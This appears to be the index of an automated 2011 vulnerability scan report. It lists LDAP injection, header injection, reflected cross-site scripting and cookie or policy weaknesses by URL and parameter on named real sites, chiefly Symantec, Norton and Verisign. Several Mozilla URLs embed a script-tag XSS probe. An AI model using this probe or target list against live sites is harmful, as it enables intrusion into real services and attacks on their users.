XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09092011-01
Report generated by XSS.CX at Sat Sep 10 00:40:28 GMT-06:00 2011.
1. LDAP injection
1.1. https://onlinefamily.norton.com/familysafety/basicpremium.fs [REST URL parameter 2]
1.2. http://player.ooyala.com/player.js [height parameter]
1.3. http://sales.liveperson.net/hc/2735064/ [PV%21pageLoadTime parameter]
1.4. http://sales.liveperson.net/hc/2735064/ [SV%21language parameter]
1.5. http://sales.liveperson.net/hc/2735064/ [defInvite parameter]
1.6. http://sales.liveperson.net/hc/2735064/ [lpCallId parameter]
1.7. http://sales.liveperson.net/hc/71097838/ [HumanClickACTIVE cookie]
1.8. http://sales.liveperson.net/hc/71097838/ [HumanClickSiteContainerID_71097838 cookie]
1.9. http://sales.liveperson.net/hc/71097838/ [lpCallId parameter]
1.10. http://sales.liveperson.net/hc/71097838/ [protV parameter]
1.11. http://sales.liveperson.net/hc/71097838/ [t parameter]
1.12. http://sales.liveperson.net/hc/71097838/ [timeout parameter]
2. HTTP header injection
2.1. https://idprotect.verisign.com/toolbar/activate.v [REST URL parameter 2]
2.2. https://idprotect.verisign.com/toolbar/download.v [REST URL parameter 2]
2.3. https://idprotect.verisign.com/toolbar/downloadIE.v [REST URL parameter 2]
2.4. https://idprotect.verisign.com/toolbar/home.v [REST URL parameter 2]
2.5. https://idprotect.verisign.com/toolbar/install.v [REST URL parameter 2]
3. Cross-site scripting (reflected)
3.1. https://cert.webtrust.org/ViewSeal [id parameter]
3.2. http://com-verisign.netmng.com/ [height parameter]
3.3. http://com-verisign.netmng.com/ [width parameter]
3.4. https://donate.mozilla.org/favicon.ico [REST URL parameter 1]
3.5. https://donate.mozilla.org/favicon.ico [name of an arbitrarily supplied request parameter]
3.6. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 1]
3.7. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 2]
3.8. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 3]
3.9. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 4]
3.10. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [name of an arbitrarily supplied request parameter]
3.11. https://fileconnect.symantec.com/licenselogin.jsp [localeStr parameter]
3.12. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer [Action_ID parameter]
3.13. http://free.pctools.com/favicon.ico [REST URL parameter 1]
3.14. http://free.pctools.com/free-antivirus/ [REST URL parameter 1]
3.15. http://free.pctools.com/free-antivirus/ [name of an arbitrarily supplied request parameter]
3.16. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]
3.17. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]
3.18. https://idprotect.verisign.com/toolbar/download.v [name of an arbitrarily supplied request parameter]
3.19. https://idprotect.verisign.com/toolbar/home.v [name of an arbitrarily supplied request parameter]
3.20. https://idprotect.verisign.com/toolbar/install.v [name of an arbitrarily supplied request parameter]
3.21. http://mbox3.offermatica.com/m2/verisign/mbox/standard [mbox parameter]
3.22. http://player.ooyala.com/player.js [playerId parameter]
3.23. http://player.ooyala.com/player.js [wmode parameter]
3.24. https://press.verisign.com/easyir/customrel.do [name of an arbitrarily supplied request parameter]
3.25. https://renewals.symantec.com/renewals/application [entry_point parameter]
3.26. http://updatecenter.norton.com/ [NUCLANG parameter]
3.27. http://www.symantec.com/business/verisign/fraud-detection-service [tid parameter]
3.28. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]
3.29. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]
3.30. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]
3.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]
3.32. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]
3.33. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]
3.34. http://www.symantec.com/s/searchg/suggest [q parameter]
3.35. https://cert.webtrust.org/ViewSeal [Referer HTTP header]
4. Flash cross-domain policy
4.1. http://ak.c.ooyala.com/crossdomain.xml
4.2. http://cp76677.edgefcs.net/crossdomain.xml
4.3. http://mbox3.offermatica.com/crossdomain.xml
4.4. http://om.symantec.com/crossdomain.xml
4.5. http://player.ooyala.com/crossdomain.xml
4.6. https://symantec-corporation.com/crossdomain.xml
4.7. http://symantec.tt.omtrdc.net/crossdomain.xml
4.8. http://ch.norton.com/crossdomain.xml
4.9. http://l.player.ooyala.com/crossdomain.xml
4.10. http://us.norton.com/crossdomain.xml
4.11. https://us.norton.com/crossdomain.xml
4.12. https://www-secure.symantec.com/crossdomain.xml
4.13. http://www.symantec.com/crossdomain.xml
4.14. http://1168.ic-live.com/crossdomain.xml
4.15. https://drh.img.digitalriver.com/crossdomain.xml
4.16. http://twitter.com/crossdomain.xml
4.17. http://www.verisign.com/crossdomain.xml
4.18. https://www.verisign.com/crossdomain.xml
5. Silverlight cross-domain policy
5.1. http://om.symantec.com/clientaccesspolicy.xml
5.2. http://player.ooyala.com/clientaccesspolicy.xml
6. SSL cookie without secure flag set
6.1. https://admin.instantservice.com/Customer
6.2. https://admin.instantservice.com/links/5851/14753
6.3. https://admin.instantservice.com/links/5851/16144
6.4. https://admin.instantservice.com/links/5851/16145
6.5. https://admin.instantservice.com/links/5851/39897
6.6. https://onlinefamily.norton.com/familysafety/loginStart.fs
6.7. https://securitycenter.verisign.com/celp/enroll/outsideSearch
6.8. https://securitycenter.verisign.com/celp/enroll/retail
6.9. https://securitycenter.verisign.com/celp/enroll/upsell
6.10. https://onlinefamily.norton.com/familysafety/basicpremium.fs
6.11. https://renewals.symantec.com/renewals/application
6.12. https://ssl-certificate-center.verisign.ch/process/retail/console_login
6.13. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
6.14. https://ssl-certificate-center.verisign.com/process/retail/console_login
6.15. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
6.16. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
6.17. https://trust-center.verisign.ch/process/retail/console_login
6.18. https://trust-center.verisign.ch/process/retail/trust_initial
6.19. https://trust-center.verisign.com/favicon.ico
6.20. https://trust-center.verisign.com/process/retail/console_login
6.21. https://trust-center.verisign.com/process/retail/help_and_support
6.22. https://trust-center.verisign.com/process/retail/redirect
6.23. https://trust-center.verisign.com/process/retail/session_timeout
6.24. https://trust-center.verisign.com/process/retail/trust_initial
6.25. https://trust-center.verisign.com/process/retail/trust_product_selector
6.26. https://trust-center.verisign.com/process/retail/trust_product_selector.do
6.27. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
6.28. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
6.29. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
6.30. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
6.31. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
6.32. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
6.33. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
6.34. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
6.35. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
6.36. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
6.37. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
6.38. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
6.39. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
6.40. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
6.41. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
6.42. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
6.43. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
6.44. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
6.45. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
6.46. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
6.47. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
6.48. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
6.49. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
6.50. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
6.51. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
6.52. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
6.53. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
6.54. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
6.55. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
6.56. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
6.57. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
6.58. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
6.59. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
6.60. https://trust-center.verisign.com/rcm/verisign/style/brand.css
6.61. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
6.62. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
6.63. https://trust-center.verisign.com/rcm/verisign/style/module.css
6.64. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
6.65. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
6.66. https://www.verisign.com/assets/visual-sciences/vip/zig.js
6.67. https://www4.symantec.com/Vrt/wl
7. Session token in URL
7.1. https://idprotect.verisign.com/images/favicon.ico
7.2. https://idprotect.verisign.com/kaptcha.jpg
7.3. https://idprotect.verisign.com/scripts/global.js
7.4. https://idprotect.verisign.com/toolbar/activate.v
7.5. http://m.verisign.com/home.v
7.6. http://mbox3.offermatica.com/m2/verisign/mbox/standard
7.7. http://mbox3.offermatica.com/m2/verisign/ubox/image
7.8. http://player.ooyala.com/sas/authorized
7.9. https://renewals.symantec.com/renewals/images/icon-pop-up.gif
7.10. http://sales.liveperson.net/hc/2735064/
7.11. https://securitycenter.verisign.com/celp/enroll/retail
7.12. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard
7.13. https://trust-center.verisign.com/process/retail/trust_product_selector
7.14. http://vipmobile.verisign.com/images/favicon.ico
7.15. https://vipmobile.verisign.com/home.v
8. SSL certificate
8.1. https://fileconnect.symantec.com/
8.2. https://forms.verisign.com/
8.3. https://knowledge.verisign.ch/
8.4. https://knowledge.verisign.com/
8.5. https://onlinefamily.norton.com/
8.6. https://query.verisign.com/
8.7. https://ssl-certificate-center.verisign.ch/
8.8. https://ssl-certificate-center.verisign.com/
8.9. https://trust-center.verisign.ch/
8.10. https://trust-center.verisign.com/
8.11. https://us.norton.com/
8.12. https://admin.instantservice.com/
8.13. https://buy-static.norton.com/
8.14. https://cdn.verisign.com/
8.15. https://cert.webtrust.org/
8.16. https://donate.mozilla.org/
8.17. https://drh.img.digitalriver.com/
8.18. https://enterprise-ssl-admin.verisign.com/
8.19. https://idprotect.verisign.com/
8.20. https://partnernet.symantec.com/
8.21. https://policy3.responsys.net/
8.22. https://press.verisign.com/
8.23. https://products.geotrust.com/
8.24. https://products.verisign.com/
8.25. https://renewals.symantec.com/
8.26. https://seal.verisign.com/
8.27. https://securitycenter.verisign.com/
8.28. https://symaccount.symantec.com/
8.29. https://symantec-corporation.com/
8.30. https://test-products.verisign.com/
8.31. https://vipdeveloper.verisign.com/
8.32. https://vipmanager.verisign.com/
8.33. https://vipmobile.verisign.com/
8.34. https://vs.symantec.com/
8.35. https://www-secure.symantec.com/
8.36. https://www.verisign.com/
8.37. https://www4.symantec.com/
9. Cookie scoped to parent domain
9.1. http://buy.norton.com/
9.2. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
9.3. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
9.4. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
9.5. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
9.6. http://buy.norton.com/estore/mf/landingProductFeatures
9.7. http://buy.norton.com/estore/mf/landingPromotion
9.8. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
9.9. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
9.10. http://buy.norton.com/estore/mf/upgradeCenter
9.11. http://buy.norton.com/estore/mf/upgradeRenewal
9.12. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
9.13. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
9.14. http://mbox3.offermatica.com/m2/verisign/mbox/standard
9.15. http://buy.norton.com/
9.16. http://buy.norton.com/ps
9.17. http://buy.norton.com/special-promotions
9.18. http://buy.norton.com/support
9.19. http://buy.norton.com/upgrades-renewals
9.20. http://buy.symanteccloud.com/freetrial
9.21. http://buy.symanteccloud.com/smbstore
9.22. http://free.pctools.com/res/js/utils.php
9.23. http://mbox3.offermatica.com/m2/verisign/mbox/standard
9.24. http://sales.liveperson.net/hc/2735064/
9.25. http://sales.liveperson.net/hc/71097838/
9.26. https://ssl-certificate-center.verisign.ch/process/retail/console_login
9.27. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
9.28. https://ssl-certificate-center.verisign.com/process/retail/console_login
9.29. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
9.30. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
9.31. https://trust-center.verisign.ch/process/retail/console_login
9.32. https://trust-center.verisign.ch/process/retail/trust_initial
9.33. https://trust-center.verisign.com/favicon.ico
9.34. https://trust-center.verisign.com/process/retail/console_login
9.35. https://trust-center.verisign.com/process/retail/help_and_support
9.36. https://trust-center.verisign.com/process/retail/redirect
9.37. https://trust-center.verisign.com/process/retail/session_timeout
9.38. https://trust-center.verisign.com/process/retail/trust_initial
9.39. https://trust-center.verisign.com/process/retail/trust_product_selector
9.40. https://trust-center.verisign.com/process/retail/trust_product_selector.do
9.41. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
9.42. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
9.43. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
9.44. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
9.45. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
9.46. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
9.47. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
9.48. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
9.49. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
9.50. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
9.51. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
9.52. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
9.53. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
9.54. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
9.55. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
9.56. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
9.57. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
9.58. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
9.59. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
9.60. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
9.61. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
9.62. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
9.63. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
9.64. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
9.65. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
9.66. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
9.67. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
9.68. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
9.69. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
9.70. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
9.71. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
9.72. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
9.73. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
9.74. https://trust-center.verisign.com/rcm/verisign/style/brand.css
9.75. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
9.76. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
9.77. https://trust-center.verisign.com/rcm/verisign/style/module.css
9.78. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
9.79. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
9.80. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
9.81. http://www.verisign.co.uk/hp07/i/vlogo.gif
9.82. https://www.verisign.com/assets/visual-sciences/vip/zig.js
10. Cookie without HttpOnly flag set
10.1. https://admin.instantservice.com/Customer
10.2. https://admin.instantservice.com/links/5851/14753
10.3. https://admin.instantservice.com/links/5851/16144
10.4. https://admin.instantservice.com/links/5851/16145
10.5. https://admin.instantservice.com/links/5851/39897
10.6. http://buy.norton.com/
10.7. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
10.8. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
10.9. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
10.10. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
10.11. http://buy.norton.com/estore/mf/landingProductFeatures
10.12. http://buy.norton.com/estore/mf/landingPromotion
10.13. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
10.14. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
10.15. http://buy.norton.com/estore/mf/upgradeCenter
10.16. http://buy.norton.com/estore/mf/upgradeRenewal
10.17. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
10.18. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
10.19. http://buy.norton.com/upgrades-renewals
10.20. https://idprotect.verisign.com/toolbar/activate.v
10.21. http://m.verisign.com/
10.22. http://mbox3.offermatica.com/m2/verisign/mbox/standard
10.23. https://onlinefamily.norton.com/familysafety/loginStart.fs
10.24. https://products.verisign.com/geocenter/reseller/doregister.do
10.25. https://products.verisign.com/geocenter/reseller/logon.do
10.26. https://products.verisign.com/geocenter/reseller/register.do
10.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch
10.28. https://securitycenter.verisign.com/celp/enroll/retail
10.29. https://securitycenter.verisign.com/celp/enroll/upsell
10.30. https://trust-center.verisign.com/process/retail/session_timeout
10.31. http://us.norton.com/beta/index.jsp
10.32. http://us.norton.com/beta/overview.jsp
10.33. http://vipmobile.verisign.com/fpa/fpa.jsp
10.34. http://vipmobile.verisign.com/images/b_shadow.png
10.35. http://vipmobile.verisign.com/images/bl_shadow.png
10.36. http://vipmobile.verisign.com/images/br_shadow.png
10.37. http://vipmobile.verisign.com/images/dot.gif
10.38. http://vipmobile.verisign.com/images/home_rght_box.gif
10.39. http://vipmobile.verisign.com/images/r_shadow.png
10.40. http://vipmobile.verisign.com/images/rt_shadow.png
10.41. http://vipmobile.verisign.com/images/topleft.gif
10.42. https://vipmobile.verisign.com/fpa/fpa.jsp
10.43. http://buy.norton.com/
10.44. http://buy.norton.com/ps
10.45. http://buy.norton.com/special-promotions
10.46. http://buy.norton.com/support
10.47. http://buy.symanteccloud.com/freetrial
10.48. http://buy.symanteccloud.com/smbstore
10.49. http://com-verisign.netmng.com/
10.50. http://com-verisign.netmng.com//
10.51. http://free.pctools.com/res/js/utils.php
10.52. http://mbox3.offermatica.com/m2/verisign/mbox/standard
10.53. https://onlinefamily.norton.com/familysafety/basicpremium.fs
10.54. http://renewals.symantec.com/renewals/application
10.55. https://renewals.symantec.com/renewals/application
10.56. http://sales.liveperson.net/hc/2735064/
10.57. http://sales.liveperson.net/hc/2735064/
10.58. http://sales.liveperson.net/hc/2735064/
10.59. http://sales.liveperson.net/hc/71097838/
10.60. http://sales.liveperson.net/hc/71097838/
10.61. http://sales.liveperson.net/hc/71097838/
10.62. https://ssl-certificate-center.verisign.ch/process/retail/console_login
10.63. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
10.64. https://ssl-certificate-center.verisign.com/process/retail/console_login
10.65. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
10.66. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
10.67. https://trust-center.verisign.ch/process/retail/console_login
10.68. https://trust-center.verisign.ch/process/retail/trust_initial
10.69. https://trust-center.verisign.com/favicon.ico
10.70. https://trust-center.verisign.com/process/retail/console_login
10.71. https://trust-center.verisign.com/process/retail/help_and_support
10.72. https://trust-center.verisign.com/process/retail/redirect
10.73. https://trust-center.verisign.com/process/retail/trust_initial
10.74. https://trust-center.verisign.com/process/retail/trust_product_selector
10.75. https://trust-center.verisign.com/process/retail/trust_product_selector.do
10.76. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
10.77. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
10.78. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
10.79. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
10.80. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
10.81. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
10.82. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
10.83. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
10.84. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
10.85. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
10.86. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
10.87. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
10.88. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
10.89. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
10.90. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
10.91. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
10.92. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
10.93. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
10.94. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
10.95. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
10.96. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
10.97. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
10.98. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
10.99. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
10.100. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
10.101. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
10.102. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
10.103. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
10.104. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
10.105. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
10.106. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
10.107. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
10.108. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
10.109. https://trust-center.verisign.com/rcm/verisign/style/brand.css
10.110. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
10.111. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
10.112. https://trust-center.verisign.com/rcm/verisign/style/module.css
10.113. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
10.114. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
10.115. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
10.116. http://www.verisign.co.uk/hp07/i/vlogo.gif
10.117. https://www.verisign.com/assets/visual-sciences/vip/zig.js
10.118. https://www4.symantec.com/Vrt/wl
11. Password field with autocomplete enabled
11.1. http://blogs.verisign.com/
11.2. https://knowledge.verisign.ch/support/code-signing-support/index.html
11.3. https://knowledge.verisign.ch/support/digital-id-support/index.html
11.4. https://knowledge.verisign.ch/support/mpki-support/index.html
11.5. https://knowledge.verisign.ch/support/ssl-certificates-support/index
11.6. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
11.7. https://knowledge.verisign.ch/support/trust-seal-support/index.html
11.8. https://knowledge.verisign.com/support/code-signing-support/index
11.9. https://knowledge.verisign.com/support/code-signing-support/index.html
11.10. https://knowledge.verisign.com/support/digital-id-support/index.html
11.11. https://knowledge.verisign.com/support/eca-support/index.html
11.12. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
11.13. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html
11.14. https://knowledge.verisign.com/support/mpki-support/index.html
11.15. https://knowledge.verisign.com/support/ssl-certificates-support/index
11.16. https://knowledge.verisign.com/support/ssl-certificates-support/index.html
11.17. https://knowledge.verisign.com/support/trust-seal-support/index.html
11.18. https://products.verisign.com/geocenter/reseller/logon.do
11.19. https://products.verisign.com/geocenter/reseller/logon.jsp
11.20. https://products.verisign.com/geocenter/reseller/register.do
11.21. http://query.verisign.ch/search
11.22. http://query.verisign.com/search
11.23. https://query.verisign.com/search
11.24. https://ssl-certificate-center.verisign.ch/process/retail/console_login
11.25. https://ssl-certificate-center.verisign.com/process/retail/console_login
11.26. https://test-products.verisign.com/geocenter/reseller/logon.do
11.27. https://trust-center.verisign.ch/process/retail/console_login
11.28. https://trust-center.verisign.com/process/retail/console_login
11.29. http://www.verisign.ch/
11.30. http://www.verisign.ch/contact-information/index.html
11.31. http://www.verisign.ch/corporate/index.html
11.32. http://www.verisign.ch/trust-seal/index.html
11.33. http://www.verisign.com/
11.34. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
11.35. http://www.verisign.com/code-signing/index.html
11.36. http://www.verisign.com/partners/ssl-reseller-programs/index.html
11.37. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
11.38. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
11.39. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
11.40. http://www.verisign.com/trust-seal/index.html
11.41. http://www.verisign.com/verisign-worldwide/index.html
11.42. https://www.verisign.com/
11.43. https://www.verisign.com/products-services/index.html
12. Referer-dependent response
12.1. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_red.png
12.2. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_white.png
12.3. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png
12.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png
12.5. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_left.png
12.6. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_right.png
12.7. http://sales.liveperson.net/hc/2735064/
13. Cross-domain POST
13.1. https://knowledge.verisign.ch/support/code-signing-support/index.html
13.2. https://knowledge.verisign.ch/support/code-signing-support/index.html
